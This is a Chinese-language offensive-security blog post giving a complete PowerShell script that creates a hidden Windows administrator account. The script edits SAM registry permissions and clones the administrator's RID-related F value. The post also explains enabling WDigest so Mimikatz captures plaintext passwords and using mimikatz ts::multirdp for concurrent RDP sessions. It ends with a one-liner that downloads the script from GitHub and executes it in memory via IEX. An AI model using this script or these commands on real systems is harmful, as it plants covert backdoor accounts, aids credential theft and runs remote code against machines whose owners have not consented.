隐藏用户建立（Powershell）

最近做测试的时候发现，windows server2012 使用Mimikatz是直接抓不到明文密码的，而且，直接创建的账号登陆有时会碰到这个问题：

ps：2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1，类型为DWORD 32才可以，然后下次用户再登录，才能记录到明文密码。

后来发现以前的建立克隆账号的方式是可以使得新建的账号登陆系统的，为了方便，整理了一个powershell脚本，脚本可以自动修改注册表键值权限（需要用administrator权限运行，即bypassuac以后的权限），之后在进行操作。具体代码如下：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

function Create-Clone { <# .SYNOPSIS This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user. .PARAMETER u The clone username .PARAMETER p The clone user's password .PARAMETER cu The user to clone, default administrator .EXAMPLE Create-Clone -u evi1cg -p evi1cg123 -cu administrator #>     Param(         [Parameter(Mandatory=$true)]         [String]         $u,             [Parameter(Mandatory=$true)]         [String]         $p,             [Parameter(Mandatory=$false)]         [String]         $cu = "administrator"     )     function upReg{         "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\up.ini         "HKEY_LOCAL_MACHINE\SAM\SAM [1 17]"| Out-File -Append  $env:temp\up.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1 17]" | Out-File -Append  $env:temp\up.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [1 17] "| Out-File -Append  $env:temp\up.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [1 17] "| Out-File -Append  $env:temp\up.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1 17]"| Out-File -Append  $env:temp\up.ini         cmd /c "regini $env:temp\up.ini"         Remove-Item $env:temp\up.ini             }     function downreg {         "HKEY_LOCAL_MACHINE\SAM [1 17]" | Out-File $env:temp\down.ini         "HKEY_LOCAL_MACHINE\SAM\SAM [17]"| Out-File -Append  $env:temp\down.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]" | Out-File -Append  $env:temp\down.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17] "| Out-File -Append  $env:temp\down.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17] "| Out-File -Append  $env:temp\down.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]"| Out-File -Append  $env:temp\down.ini         cmd /c "regini $env:temp\down.ini"         Remove-Item $env:temp\down.ini     }     function Create-user ([string]$Username,[string]$Password) {         $group = "Administrators"         $existing = Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"         if (!$existing) {             Write-Host "[*] Creating new local user $Username with password $Password"             & NET USER $Username $Password /add /y /expires:never | Out-Null             Write-Host "[*] Adding local user $Username to $group."             & NET LOCALGROUP $group $Username /add | Out-Null                         }         else {             Write-Host "[*] Adding existing user $Username to $group."             & NET LOCALGROUP $group $Username /add | Out-Null             $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"             $exist = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }             Write-Host "[*] Setting password for existing local user $Username"             $exist.SetPassword($Password)         }             Write-Host "[*] Ensuring password for $Username never expires."         & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE   | Out-Null      }     function GetUser-Key([string]$user)     {         cmd /c " echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user [1 17] >> $env:temp\$user.ini"         cmd /c "regini $env:temp\$user.ini"         Remove-Item $env:temp\$user.ini         if(Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user"){             cmd /c "regedit /e $env:temp\$user.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user""             $file = Get-Content "$env:temp\$user.reg"  | Out-String             $pattern="@=hex\((.*?)\)\:"             $file -match $pattern |Out-Null             $key = "00000"+$matches[1]             Write-Host "[!]"$key             return $key         }else {             Write-Host "[-] SomeThing Wrong !"         }                 }     function Clone ([string]$ukey,[string]$cukey) {         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey [1 17] "| Out-File $env:temp\f.ini         "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$cukey [1 17] " | Out-File $env:temp\f.ini         cmd /c " regini $env:temp\f.ini"         Remove-Item $env:temp\f.ini         $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey" |Out-String         $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey" |Out-String         Write-Host "[*] Get clone user'F value"         $cuFreg = Get-Item -Path $cureg.Trim()         $cuFvalue = $cuFreg.GetValue('F')         Write-Host "[*] Change user'F value"         Set-ItemProperty -path $ureg.Trim()  -Name "F" -value $cuFvalue         $outreg = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\$ukey"         cmd /c "regedit /e $env:temp\out.reg $outreg.Trim()"     }     function Main () {         if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))         {             Write-Output "Script must be run as administrator"             break         }         Write-Output "[*] Start"         Write-Output "[*] Tring to change reg privilege !"         upReg         if( !(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$cu")){             Write-Host "[-] The User to Clone does not exist !"             Write-Output "[*] Change reg privilege back !"             downReg             Write-Output "[*] Exiting !"         }         else {             if(!(Test-Path -path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$u")){                 $tmp = "1"             }             else{                 $tmp = "0"             }             Write-Output "[*] Create User..."             Create-user $u $p             Write-Output "[*] Get User $u's  Key .."             $ukey = GetUser-Key $u |Out-String             Write-Output "[*] Get User $cu's  Key .."             $cukey = GetUser-Key $cu |Out-String             Write-Output "[*] Clone User.."             Clone $ukey $cukey             if($tmp -eq 1 ){                 Write-Output "[*] Delete User.."                 cmd /c "net User $u /del " |Out-Null             }else{ Write-Output "[*] Don't need to delete.."}             cmd /c "regedit /s $env:temp\$u.reg"             cmd /c "regedit /s $env:temp\out.reg"             Remove-Item $env:temp\*.reg             Write-Output "[*] Change reg privilege back !"             downreg             Write-Output "[*] Done"         }          }     Main }

GITHUB：

新建账号以后，可成功登陆系统

在Win7上做的测试如下：

demo

当然可以配合这个姿势来实现多用户登陆。

使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

ps:该方法在系统重启后失效，下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改

最后是远程执行的方式：

1	powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1'); Create-Clone -u demo$ -p test123